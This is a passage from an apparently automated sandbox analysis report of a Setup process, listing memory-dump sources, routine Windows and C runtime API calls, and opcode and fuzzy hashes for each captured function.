                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 6C94404C
                                                                • Part of subcall function 6C9689C8: GetLastError.KERNEL32(6C9180E8,6C91A9FA,?,80000000,00000001,00000003,00000080,00000000,00000000,?,?,?,?,?,00000001), ref: 6C9689C8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: BuffersChangeCloseErrorFileFindFlushLastNotification
                                                              • String ID:
                                                              • API String ID: 4236133906-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 0003291C
                                                              • Run.SETUPENGINE ref: 00032922
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: HeapInformation
                                                              • String ID:
                                                              • API String ID: 3918721486-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794,00000000), ref: 6C94851E
                                                              • MultiByteToWideChar.KERNEL32(00000003,00000000,00000000,000000FF,00000000,00000000,00000000,6C94FA6E,02642228,?,?,6C9483B3,02642228,6C90A794,02642228,6C90A794), ref: 6C94853F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 626452242-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C913A1D
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C948C7A: __EH_prolog3.LIBCMT ref: 6C948C81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID:
                                                              • API String ID: 431132790-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934205
                                                                • Part of subcall function 6C922771: __EH_prolog3.LIBCMT ref: 6C922778
                                                                • Part of subcall function 6C934F19: __EH_prolog3.LIBCMT ref: 6C934F20
                                                                • Part of subcall function 6C932081: __EH_prolog3.LIBCMT ref: 6C932088
                                                                • Part of subcall function 6C91C17A: _calloc.LIBCMT ref: 6C91C1A0
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ExceptionRaise_calloc
                                                              • String ID:
                                                              • API String ID: 1540488672-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947890
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C94A226: GetTickCount.KERNEL32 ref: 6C94A241
                                                                • Part of subcall function 6C94A226: GetTickCount.KERNEL32 ref: 6C94A27C
                                                                • Part of subcall function 6C94A226: __time64.LIBCMT ref: 6C94A282
                                                                • Part of subcall function 6C94A226: InitializeCriticalSection.KERNEL32(00000040,?,6C947905,?), ref: 6C94A292
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CountTick$CriticalH_prolog3InitializeSection__time64_malloc
                                                              • String ID:
                                                              • API String ID: 349597444-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9259BF
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C92578A
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C925799
                                                                • Part of subcall function 6C9256A3: SysFreeString.OLEAUT32(?), ref: 6C9257C7
                                                                • Part of subcall function 6C951315: __EH_prolog3.LIBCMT ref: 6C95131C
                                                                • Part of subcall function 6C951315: _free.LIBCMT ref: 6C95137B
                                                                • Part of subcall function 6C94B17C: __recalloc.LIBCMT ref: 6C94B18D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeString$H_prolog3$__recalloc_free
                                                              • String ID:
                                                              • API String ID: 2446356840-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92A65C
                                                                • Part of subcall function 6C92670B: __EH_prolog3.LIBCMT ref: 6C926712
                                                                • Part of subcall function 6C926BBD: __EH_prolog3.LIBCMT ref: 6C926BC4
                                                                • Part of subcall function 6C923B22: __EH_prolog3.LIBCMT ref: 6C923B29
                                                                • Part of subcall function 6C929746: __EH_prolog3.LIBCMT ref: 6C92974D
                                                                • Part of subcall function 6C968EAB: _memcpy_s.LIBCMT ref: 6C968EFC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1663610674-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9514D8
                                                                • Part of subcall function 6C953ACC: __EH_prolog3.LIBCMT ref: 6C953AD3
                                                                • Part of subcall function 6C953ACC: _memcpy_s.LIBCMT ref: 6C953B17
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1663610674-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 6C4A5E81
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID:
                                                              • API String ID: 1378638983-0
                                                              • Opcode ID: b352b835ff6871c50ea8fe139ecb99d3ad9a513fb4eda463f43d76ba2564f64c
                                                              • Instruction ID: c009a40e3fd1f6cd5b9566e66b2b272ff0fec01ba8b13968339a74d207b8bded
                                                              • Opcode Fuzzy Hash: b352b835ff6871c50ea8fe139ecb99d3ad9a513fb4eda463f43d76ba2564f64c
                                                              • Instruction Fuzzy Hash: BB21CC71104B04AFCB20CF95CA80E8FBBF5EF68315F20850AE85697A54C331E982CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4964C9
                                                                • Part of subcall function 6C48D349: __EH_prolog3.LIBCMT ref: 6C48D350
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C48D2B6: __EH_prolog3.LIBCMT ref: 6C48D2BD
                                                                • Part of subcall function 6C49F5FD: __EH_prolog3.LIBCMT ref: 6C49F604
                                                                • Part of subcall function 6C49F5FD: __recalloc.LIBCMT ref: 6C49F612
                                                                • Part of subcall function 6C48D4C5: __EH_prolog3.LIBCMT ref: 6C48D4CC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$__recalloc
                                                              • String ID:
                                                              • API String ID: 1900422986-0
                                                              • Opcode ID: 43352892bf9d17e7fded7039b23e338f1cbf14336471bfa93223dcecc660f442
                                                              • Instruction ID: fd6792429cf548a4816c78062878faddc672b41db82556a1be402b30217a42ce
                                                              • Opcode Fuzzy Hash: 43352892bf9d17e7fded7039b23e338f1cbf14336471bfa93223dcecc660f442
                                                              • Instruction Fuzzy Hash: 97213B329011199BCF01DBA8C944EDEB7B4AF54668F244259E424BB795EB34EA09CBE0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C932088
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: 18fc04472e25cf937a9f3dc98122a72e6943e946ba6c893ff0db1acd94bc41b7
                                                              • Instruction ID: 53d63e9fa124212ad29f5167ffb6efa3fd5e00e4451c4238e1cf36d758f1e341
                                                              • Opcode Fuzzy Hash: 18fc04472e25cf937a9f3dc98122a72e6943e946ba6c893ff0db1acd94bc41b7
                                                              • Instruction Fuzzy Hash: FD2156B0A01A46CFCB08CF68C1948A9FBF1FF68300725C59DD4599BB22C730E954CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 6C9566E5: __EH_prolog3.LIBCMT ref: 6C9566EC
                                                                • Part of subcall function 6C9566E5: GetCommandLineW.KERNEL32(00000024,6C9536CF,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9566F3
                                                                • Part of subcall function 6C9566E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?), ref: 6C95672F
                                                                • Part of subcall function 6C956782: __EH_prolog3.LIBCMT ref: 6C956789
                                                                • Part of subcall function 6C956782: CoInitialize.OLE32(00000000), ref: 6C9567DD
                                                                • Part of subcall function 6C956782: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,6C94FA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000), ref: 6C9567FB
                                                              • GetUserDefaultUILanguage.KERNEL32(02642228,?,00000000,?,?,?,?,6C951338,?,00000010,6C925A14,?,?,?,0000004C,6C95B498), ref: 6C9536D8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                              • String ID:
                                                              • API String ID: 4049621043-0
                                                              • Opcode ID: 8fa91619c10349100861cad4dabd5229facc1bb8c5040e4aa6604ddbe75350ec
                                                              • Instruction ID: 2a73798773389a875b63736887ac081b52298ca00fddfd29ee92f9848251c163
                                                              • Opcode Fuzzy Hash: 8fa91619c10349100861cad4dabd5229facc1bb8c5040e4aa6604ddbe75350ec
                                                              • Instruction Fuzzy Hash: 730108716016415FE310CA3AC8C085A7399EF61274BA0832DE5B587BD0E730DC118B51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C96D777,6C96C0C9,?,00000000,00000000,00000000,?,6C96D37E,00000001,00000214,?,6C94831D), ref: 6C970F1D
                                                                • Part of subcall function 6C96BD29: __getptd_noexit.LIBCMT ref: 6C96BD29
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 7fb0baeab95c3f48aafa07f58b97e242810e648beef80d45feee09a53602e32c
                                                              • Instruction ID: 72e0b54ccad0c606f6cdfcf6d29675eaa63cf8ec486b88ff2065f071e17876fb
                                                              • Opcode Fuzzy Hash: 7fb0baeab95c3f48aafa07f58b97e242810e648beef80d45feee09a53602e32c
                                                              • Instruction Fuzzy Hash: 5501F53130B2919AEB288F66D910B5A37A8AF42368F10562AF829CA980D772C420C660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C4A9F86,6C4A91D6,?,00000000,00000000,00000000,?,6C4A9B8D,00000001,00000214,?,6C4AB575), ref: 6C4AD71F
                                                                • Part of subcall function 6C4AB570: __getptd_noexit.LIBCMT ref: 6C4AB570
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 97229198c738f32c7c958c661674abe6941dfbfd80bf49bf5dd5976310c2de26
                                                              • Instruction ID: 78ef3a8e5fe6932626967fc4aab8c3e299a2f5537db668b3285f92732fe206e7
                                                              • Opcode Fuzzy Hash: 97229198c738f32c7c958c661674abe6941dfbfd80bf49bf5dd5976310c2de26
                                                              • Instruction Fuzzy Hash: FF01F53D7012158BFB1DDEE1C848F5633A4ABA2769F104629EC258BAD8DB70C402C280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00034F98,?,?,00000000,00000000,00000000,?,00033A5D,00000001,00000214,?,00032FA5), ref: 000361F1
                                                                • Part of subcall function 000347E5: __getptd_noexit.LIBCMT ref: 000347E5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 328603210-0
                                                              • Opcode ID: 41d0e8c3c05c44a8724e78fdd288aba7ce6dceacf208de63d319226d3ad1b618
                                                              • Instruction ID: f84bdeeb379a03fe57e1d85c2c9bd2f0e65c5db9cb271fab4d18433f36db73bb
                                                              • Opcode Fuzzy Hash: 41d0e8c3c05c44a8724e78fdd288aba7ce6dceacf208de63d319226d3ad1b618
                                                              • Instruction Fuzzy Hash: 0C01D8353016156BEBAB9F64DC14BAB3BDCAF81760F058A29EC16CB1D0DB76D800C750
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C923B29
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: babea73a03da05e1e5e4fbc0c29cac487ab489a62e4195fde1a3f813986de92a
                                                              • Instruction ID: 55b096d985dd591f4985e1bb1774a0bd7d55dd089a13179ca65b67c8b6deb86e
                                                              • Opcode Fuzzy Hash: babea73a03da05e1e5e4fbc0c29cac487ab489a62e4195fde1a3f813986de92a
                                                              • Instruction Fuzzy Hash: 40113570B10A06DFDB18CF79C580869B7B4FF69308720C9A9D0599BA24D731E959CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92974D
                                                                • Part of subcall function 6C9678C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,6C95139B,?,00000010,6C925A14,?,?,?,0000004C,6C95B498,?,?,?), ref: 6C9678D3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ExceptionH_prolog3Raise
                                                              • String ID:
                                                              • API String ID: 741760457-0
                                                              • Opcode ID: 02a0bd2ce9ab06a69983cb0c1a2f32ba4d66797d08bd596de470268f90d5e671
                                                              • Instruction ID: 7d15e216af9cfbd98d366bf32f30ebc93f1f91fdc37ba1241e794288bc9dd6ce
                                                              • Opcode Fuzzy Hash: 02a0bd2ce9ab06a69983cb0c1a2f32ba4d66797d08bd596de470268f90d5e671
                                                              • Instruction Fuzzy Hash: 80115B70B01A06DFD708DF69C480899B7F4FFA4708725C9A9D0998BB20D731E956CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
